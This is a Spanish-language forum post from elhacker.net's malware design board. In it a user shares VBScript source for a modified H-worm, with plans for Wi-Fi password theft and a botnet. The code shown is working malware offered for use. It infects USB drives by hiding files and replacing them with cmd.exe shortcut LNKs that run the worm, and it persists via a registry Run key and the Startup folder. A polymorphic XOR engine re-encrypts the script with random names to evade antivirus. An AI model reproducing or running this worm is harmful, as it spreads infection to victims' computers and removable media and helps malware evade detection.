elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware
| | |-+  Abril negro (Moderadores: Man-In-the-Middle, WHK, kub0x, fary)
| | | |-+  [Malware Modificado] H-worm VBS con Motor Polimorfico		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Malware Modificado] H-worm VBS con Motor Polimorfico  (Leído 56 veces)
Bad4m_cod3

Desconectado Desconectado

Mensajes: 25


"a28ed83f69647d8f2a1046b9fa0e7c2c" H.P.Lovecraft


Ver Perfil
[Malware Modificado] H-worm VBS con Motor Polimorfico
« en: Ayer a las 21:13 »
A continuacion presento un nuevo tema donde expongo el desarrollo de un malware polimorfico, pretendo hacerlo solo en VBScript por la facilidad del lenguaje y porque el mismo me permite crear un modelo polimorfico, que pueda realizar lo siguiente.

  • 1. Contaminar USB por archivos LNK
  • 2. Robar contraseñas Wifi guardadas en Windows
  • 3. Creacion de un Payload para crear una Botnet usando el protocolo HTTP
  • 4. Capturas de pantalla

De esta forma tenemos un programa basico para creacion de una botnet sencilla. Este es el adelanto del codigo fuente.

Código
  1. Set lnk_infect_houdini = New Basic_lnk_infec
  2. Set mod_polimorfic_XOR = New Polimorfic_VBScripts_Motors
  3.  
  4. 'mod_polimorfic_XOR.Polimorfic_VBS_XORSPLIT
  5.  
  6. 'lnk_infect_houdini.install_lnk_drive_USB
  7. 'lnk_infect_houdini.uninstall
  8.  
  9. Class Basic_lnk_infec
  10.  
  11. dim shellobj,filesystemobj
  12. dim installname,startup
  13. dim lnkfile,lnkfolder,installdir
  14.  
  15. Private Sub Class_Initialize()
  16.   installdir = "%temp%"
  17.   lnkfile = True
  18.   lnkfolder = True
  19.   set shellobj = createobject("wscript.shell")
  20.   set filesystemobj = createobject("scripting.filesystemobject")
  21.   installname = wscript.scriptname
  22.   startup = shellobj.specialfolders ("startup") & "\"
  23.   installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  24.   if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  25. end sub
  26. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  27. sub install_lnk_drive_USB
  28. on error resume next
  29. dim lnkobj,filename,foldername,fileicon,foldericon
  30. upstart
  31. for each drive in filesystemobj.drives
  32. if  (drive.isready) and (drive.freespace  > 0) and (drive.drivetype  = 1)  then
  33.     filesystemobj.copyfile wscript.scriptfullname,drive.path & "\" & installname,true
  34.     if  filesystemobj.fileexists (drive.path & "\" & installname) then filesystemobj.getfile(drive.path & "\"  & installname).attributes = 6
  35.     for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  36.         if not lnkfile then exit for
  37.         if  instr (file.name,".") then
  38.             if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  39.                 file.attributes = 6
  40.                 if  ucase (file.name) <> ucase (installname) then
  41.                     filename = split(file.name,".")
  42.                     fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
  43.                     if  instr (fileicon,",") = 0 then
  44.                         log_ico = file.path
  45.                     else 
  46.                         log_ico = fileicon
  47.                     end if
  48.                     create_lnk drive.path & "\"  & filename (0) & ".lnk","/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit",log_ico
  49.                 end if
  50.             end if
  51.         end if
  52.     next
  53.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  54.         if not lnkfolder then exit for
  55.         folder.attributes = 6
  56.         foldername = folder.name
  57.         foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
  58.         if  instr (foldericon,",") = 0 then
  59.             ico_log = folder.path
  60.         else 
  61.             ico_log = foldericon
  62.         end if
  63.         create_lnk drive.path & "\"  & foldername & ".lnk","/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit",ico_log
  64.     next
  65. end If
  66. next
  67. err.clear
  68. end sub
  69. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  70. sub uninstall
  71. on error resume next
  72. dim filename
  73. dim foldername
  74. downstart
  75. for  each drive in filesystemobj.drives
  76. if (drive.isready) and (drive.freespace  > 0) and (drive.drivetype  = 1) then
  77.   for each file in filesystemobj.getfolder ( drive.path & "\").files
  78.          if  instr (file.name,".") then
  79.              if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  80.                  file.attributes = 0
  81.                  if  ucase (file.name) <> ucase (installname) then
  82.                      filename = split(file.name,".")
  83.                      filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  84.                  else
  85.                      filesystemobj.deletefile (drive.path & "\" & file.name)
  86.                  end If
  87.              else
  88.                  filesystemobj.deletefile (file.path) 
  89.              end if
  90.          end if
  91.      next
  92.      for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  93.          folder.attributes = 0
  94.      next
  95. end if
  96. next
  97. wscript.quit
  98. end sub
  99. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  100. public sub upstart ()
  101. on error resume next
  102. set shellobj = createobject("wscript.shell")
  103. shellobj.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\linux",  "wscript.exe //B " & chr(34) & installdir & installname & chr(34) , "REG_SZ"
  104. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  105. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  106. end sub
  107. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  108. public sub downstart ()
  109. on error resume next
  110. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\linux"
  111. filesystemobj.deletefile startup & installname ,true
  112. filesystemobj.deletefile wscript.scriptfullname ,true
  113. end sub
  114. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  115. function create_lnk(file_name_lnk,arg_str,icon_log)
  116. set lnkobj = shellobj.createshortcut(file_name_lnk) 
  117.         lnkobj.windowstyle = 7
  118.         lnkobj.targetpath = "cmd.exe"
  119.         lnkobj.workingdirectory = ""
  120.         lnkobj.arguments = arg_str
  121.         lnkobj.iconlocation = icon_log
  122.         lnkobj.save()
  123. end function
  124. end Class
  125. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  126.  
  127. Class Polimorfic_VBScripts_Motors
  128.   Dim lenalfavar, lenalfaspl
  129.   Dim alfabet_var, alfabet_split
  130.   Dim FileSystemObject
  131.   Dim LABEL_TYPE_ENCRYPTER_XORSPLIT
  132.   Dim LABEL_TYPE_ENCRYPTER_sutwo
  133. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  134.   Private Sub Class_Initialize()
  135.   '
  136.   ' Genera el objecto del sistema de manejo de ficheros,
  137.   '
  138.     alfabet_var = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 'len=52
  139.     alfabet_split = "/\?#$@|°¬" 'len=9
  140.     lenalfavar = len(alfabet_var)-1 '[0-51]
  141.     lenalfaspl = len(alfabet_split)-1 '[0-7]
  142.     set FileSystemObject = createobject("scripting.filesystemobject")
  143.  
  144.     LABEL_TYPE_ENCRYPTER_XORSPLIT = "'EncrypterXORSPLITV1.0"
  145.   end sub
  146. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  147.   Public sub Polimorfic_VBS_XORSPLIT() 'Genera el proceso de Polimorfismo, cifrando y descifrandose a si mismo
  148.       EncrypterVBS_code = FileSystemObject.opentextfile(wscript.scriptfullname,1).readall 'Se lee a si mismo (Si esta vacio produce un error)
  149.       if instr(split(EncrypterVBS_code,vbcrlf)(0),"execute") <> 0 then 'Si esta cifrado entonces se decifra con Decode_VBS_XORSPLIT, busca la etiqueta y se vuelve a cifrar
  150.         Code_VBS = Decode_VBS_XORSPLIT(EncrypterVBS_code)
  151.           if split(Code_VBS,vbcrlf)(0) = LABEL_TYPE_ENCRYPTER_XORSPLIT then
  152.             FileSystemObject.createtextfile(wscript.scriptname).write Encode_VBS_XORSPLIT(Code_VBS)
  153.           else 
  154.             wscript.quit
  155.           end if
  156.       else'Si no esta cifrado entonces añade la etiqueta LABEL_TYPE_ENCRYPTER_XORSPLIT al principio del codigo fuente y se cifra a si mismo
  157.           EncrypterVBS_code = LABEL_TYPE_ENCRYPTER_XORSPLIT & vbcrlf & EncrypterVBS_code
  158.           FileSystemObject.createtextfile(wscript.scriptname).write Encode_VBS_XORSPLIT(EncrypterVBS_code)
  159.       end if
  160.   end sub
  161. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  162.   Public Function Decode_VBS_XORSPLIT(code)
  163.     dim String_One_Line_Code_VBS, var_temp_split
  164.  
  165.     String_One_Line_Code_VBS = split(split(code,vbcrlf)(0),"(")'Extrae la primera linea del codigo
  166.     String_One_Line_Code_VBS(2) = KickString(String_One_Line_Code_VBS(2),String_One_Line_Code_VBS(1))
  167.     String_One_Line_Code_VBS(2) = KickString(String_One_Line_Code_VBS(2),"),")
  168.  
  169.     'En String_One_Line_Code_VBS(2) esta el codigo cifrado, en String_One_Line_Code_VBS(3) esta el password
  170.  
  171.     var_temp_split = split(String_One_Line_Code_VBS(2),",")
  172.     spliit = KickString(var_temp_split(1),chr(34))
  173.     cifrado = KickString(var_temp_split(0),chr(34))
  174.     password = KickString(split(String_One_Line_Code_VBS(3),",")(0),chr(34))
  175.  
  176.   'Extrae las cadenas y elimina comillas
  177.  
  178.     Decode_VBS_XORSPLIT = encode_xor(Str_split_decode(cifrado,spliit),Str_split_decode(password,spliit))' Descifra el VBScript
  179.   end function
  180. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  181.   Public Function Encode_VBS_XORSPLIT(VBScode)
  182.     randomize
  183.       modcode = "execute %0(%7(%1,%12),%7(%2,%12))" & vbcrlf
  184.       modcode = modcode & "Function %0(%3,%4)" & vbcrlf
  185.       modcode = modcode & "For %5 = 1 to len(%3)" & vbcrlf
  186.       modcode = modcode & "%6 = %6 + 1" & vbcrlf
  187.       modcode = modcode & "%0 = %0 & chr((asc(mid(%3,%5,1)))xor(asc(mid(%4,%6,1))))" & vbcrlf
  188.       modcode = modcode & "if %6 = len(%4) then %6 = 0" & vbcrlf
  189.       modcode = modcode & "next" & vbcrlf
  190.       modcode = modcode & "end function" & vbcrlf
  191.       modcode = modcode & "function %7(%8,%9)" & vbcrlf
  192.       modcode = modcode & "%10 = split(%8,%9)" & vbcrlf
  193.       modcode = modcode & "for %11 = LBound(%10) to Ubound(%10)" & vbcrlf
  194.       modcode = modcode & "%7 = %7 & chr(%10(%11))" & vbcrlf
  195.       modcode = modcode & "next" & vbcrlf
  196.       modcode = modcode & "end function"
  197.  
  198.     var_split = Ramdon_var_spliter()
  199.     password = random_String(16)
  200.     cifrado = encode_xor(VBScode,password)
  201.  
  202.         for inx = 3 to 11 'Genera variable aleatorias en el codigo
  203.           modcode = replace(modcode,"%" & inx,ramdon_vars(10))
  204.         next
  205.  
  206.       'añade al codigo los nombres de las funciones, la llave de cifrado, el codigo cifrado... En resumen Encapsula el codigo cifrado
  207.       modcode = replace(modcode,"%0",ramdon_vars(10)) 
  208.       modcode = replace(modcode,"%12",AddComillas(var_Split))
  209.       modcode = replace(modcode,"%1",AddComillas(Str_split_encode(cifrado,var_split)))
  210.       modcode = replace(modcode,"%2",AddComillas(Str_split_encode(password,var_Split)))
  211.     Encode_VBS_XORSPLIT = modcode
  212.   end function
  213. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  214.   Private Function Ramdon_var_spliter()'extrae el caracter random de alfabet_split
  215.     randomize
  216.     Random_number = rnd*lenalfaspl
  217.     if Random_number < 1 then Random_number = 1
  218.     Ramdon_var_spliter = mid(alfabet_split,Random_number,1)
  219.   end function
  220. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  221.   Private Function ramdon_vars(lenvar) 'Genera un String con caracteres aleatorios del String alfabet_var de tamaño lenvar
  222.     randomize
  223.       For inx = 1 to lenvar
  224.         Random_number = Fix(rnd * lenalfavar)
  225.         if Random_number < 1 then Random_number = 1
  226.         ramdon_vars = ramdon_vars & mid(alfabet_var,Random_number,1)
  227.       next
  228.   end function
  229. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  230.   Private Function random_String(lenvar) 'Devuelve un String aleatoria de caracteres ASCII de tamaño lenvar
  231.     randomize
  232.       For inx = 1 to lenvar
  233.         random_String = random_String & chr(Fix(rnd*255))
  234.       next
  235.   end function
  236. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  237.   Private Function encode_xor(string_cliptext,password_spliter) 'Funcion de cifrado y descifrado con Or-Exclusiva (Xor)
  238.     lenstr=len(string_cliptext):lenpa=len(password_spliter)
  239.       For inx_String_cliptext = 1 to lenstr
  240.         count_password_spliter = count_password_spliter + 1
  241.         chr_cliptxt = Asc(mid(string_cliptext , inx_String_cliptext , 1))
  242.         chr_pwr = Asc(mid(password_spliter,count_password_spliter,1))
  243.         encode_xor = encode_xor & chr(chr_cliptxt Xor chr_pwr)
  244.           if count_password_spliter => lenpa then count_password_spliter = 0
  245.       next
  246.   end function
  247. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  248.   Private function Str_split_decode(String_encode,password_spliter) 'Decodifica el cifrado split 
  249.     array_Str_Encode = split(String_encode,password_spliter)
  250.       for inx = LBound(array_Str_Encode) to Ubound(array_Str_Encode)
  251.         Str_split_decode = Str_split_decode & chr(array_Str_Encode(inx))
  252.       next
  253.   end function
  254. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  255.   Private Function Str_split_encode(string_Cliptext,password_spliter) 'Codfifica con cifrado split
  256.     Len_string_Cliptext = len(string_Cliptext)
  257.       for inx = 1 to (Len_string_Cliptext-1)
  258.         Str_split_encode = Str_split_encode & Cstr(Asc(mid(string_Cliptext,inx,1))) & password_spliter
  259.       next
  260.     Str_split_encode = Str_split_encode & Cstr(Asc(mid(string_Cliptext,Len_string_Cliptext,1)))
  261.   end function
  262. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  263.   Private Function KickString(str1,str2):KickString = replace(str1,str2,""):End function 
  264.   Private Function AddComillas(strr):AddComillas=chr(34)&strr&chr(34):end function 'Añade comillas
  265. End Class

Aun esta en prueba pero lo basico esta hecho.


Saludos
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Algoritmo de cifrado Polimórfico
Análisis y Diseño de Malware 		MCKSys Argentina 2 5,496 Último mensaje 20 Diciembre 2016, 23:35 pm
por Borito30
Más peligroso todavía: Cloud Atlas avanza hacia el ‘malware’ polimórfico
Noticias 		wolfbcn 0 1,539 Último mensaje 14 Agosto 2019, 01:45 am
por wolfbcn
Muestra de virus Polimorfico Sality.
Análisis y Diseño de Malware 		**Aincrad** 2 2,488 Último mensaje 15 Agosto 2020, 23:39 pm
por **Aincrad**
[Motor Polimorfico] Prototipo funcional en VBScript.
Análisis y Diseño de Malware 		Bad4m_cod3 0 965 Último mensaje 24 Octubre 2024, 19:41 pm
por Bad4m_cod3
[DESARROLLO DE MALWARE POLIMORFICO] Hworm VBS modificado.
Análisis y Diseño de Malware 		Bad4m_cod3 0 88 Último mensaje Ayer a las 21:18
por Bad4m_cod3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines